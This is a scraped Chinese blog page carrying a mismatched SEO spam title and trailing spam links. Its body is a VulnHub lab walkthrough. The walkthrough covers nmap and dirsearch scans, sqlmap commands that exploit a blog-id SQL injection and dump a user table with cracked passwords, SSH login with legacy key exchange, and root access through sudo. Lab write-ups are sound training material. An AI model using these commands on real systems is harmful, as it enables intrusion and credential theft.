当前位置: 首页 > news >正文

wordpress工业模板北京免费关键词优化

wordpress工业模板,北京免费关键词优化,网站模板演示怎么做,软件如何制作#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 一、信息收集 1.主机探测 靶机IP地址是192.168.111.131 2.nmap扫描 端口开放了22、25、80、631端口 ┌──(rootkali)-[~/桌面] └─# nmap -sS -A 192.168.111.131nmap漏洞扫描 扫描出来这么多漏洞包括跨站请求伪造csrf、文件遍历、sql注入等 ┌──(rootkali)-[~/桌面] └─# nmap --scriptvuln -p22,25,80,631 192.168.111.131 使用 --scriptvuln 可以对目标主机或目标主机所在的网段应用弱口令检测 3.目录扫描 ┌──(rootkali)-[~/桌面] └─# dirsearch -u http://192.168.111.131二、漏洞利用 1.web渗透利用 端口开放22,25,80,631其中631关闭了22扫描没有有关的漏洞放在最后看25邮件服务80web端口从目前看是最先利用的端口了 80web端口 自己碰到这种页面可以尝试着自己多点击一下功能看看有什么突破没有 我这里在点击Blog模块然后再随机点击别的就出现了以下 的界面可能存在sql注入漏洞 在这里尝试输入不同的id值发现 输入5以后的数字就变成了一篇文章说明存在sql注入漏洞 我们现在再利用单引号去看看会不会发生报错去检测sql注入的注入点 发现报错了说明192.168.111.131/index.html?pageblogtitleBlogid5是注入点 2.sqlmap注入 sqlmap一把梭 ##数据库 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 --dbs --batch##表 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks --tables --batch ##列 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user --columns --batch ##字段 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user -C user_id,user_name,user_pass --dump --batch 数据库ehks的表user中成功发现了几个用户名和密码并对密码的md5进行了自动破解 ---------------------------------------------------------------------- | user_id | user_name | user_pass | ---------------------------------------------------------------------- | 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) | | 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) | | 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) | | 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) | | 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) | | 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) | ---------------------------------------------------------------------- 3.ssh远程连接 一般发现账号密码然后又开启了22端口先尝试下利用ssh远程连接 但是这里发现是ssh的版本过低的原因 经过利用chatgpt的提示得到下面的命令行成功拿到了dstevens用户的权限 ssh -oKexAlgorithmsdiffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens192.168.111.131 三、提权 1.SUID提权 发现没有什么可以利用提权的命令 [dstevensctf4 mail]$ find / -user root -perm -4000 -print 2/dev/null 2.sudo提权 sudo -l发现直接可以是最高权限 直接sudo -i拿到root权限 3.flag 可以利用find查找下flag在哪 [rootctf4 ~]# find / -name *flag*
http://www.pierceye.com/news/998167/

相关文章:

  • 万网虚拟机怎么做两个网站网页设计实训步骤
  • 福田做网站公司怎么选择wordpress怎样在列表页使用瀑布流
  • 做导航网站用多大的空间广州天河区有哪些大学
  • 广州市城乡建设部网站首页做婚礼设计在哪个网站下载素材
  • 网站建设推广服务合同范本什么是电子商务专业?
  • 青岛网站建设公司电话棋牌室的网站怎么做
  • 网站更改公司需要重新备案吗传媒网站
  • 海诚网站建设青岛李村网站设计公司
  • 哪个网站可以宣传做的蛋糕网站商城微信支付接口申请
  • 如何做淘客推广网站可信赖的手机网站设计
  • 西城专业网站建设公司哪家好外贸网站优化谷歌关键词排名
  • 先做网站后备案仿做网站可以整站下载器吧
  • ASP.NET实用网站开发 课后答案开发网站过程
  • 做网站需要编码吗仿站网站源码
  • 响应式网站什么意思爱南宁app下载官网最新
  • 自己做的网站怎么添加采集模块网站管理包括哪些内容
  • php做网站验证码的设计电商网站的二级怎么做
  • 广西网站建设价钱微信crm管理系统
  • 福州网站建设公司中小企业荆门市城乡建设管理局网站
  • 建设信用卡网站首页有做车身拉花的网站吗
  • 怎么做婚恋网站织梦网站推广插件
  • rtt全民互助平台网站开发自己怎样做免费网站
  • 建站模板东营建网站公司
  • 如何用vs做网站网络推广方案下拉管家微xiala11
  • 可以做彩票广告的网站吗做网站的应用
  • 龙岗网站 建设深圳信科湘潭做网站价格品牌磐石网络
  • 湖北网站排名优化安卓项目开发
  • 网站怎么引入微信支付郑州官方通报
  • 在南宁做家教兼职的网站北京通州做网站
  • 深圳网站的建设维护公司秦皇岛市建设局官网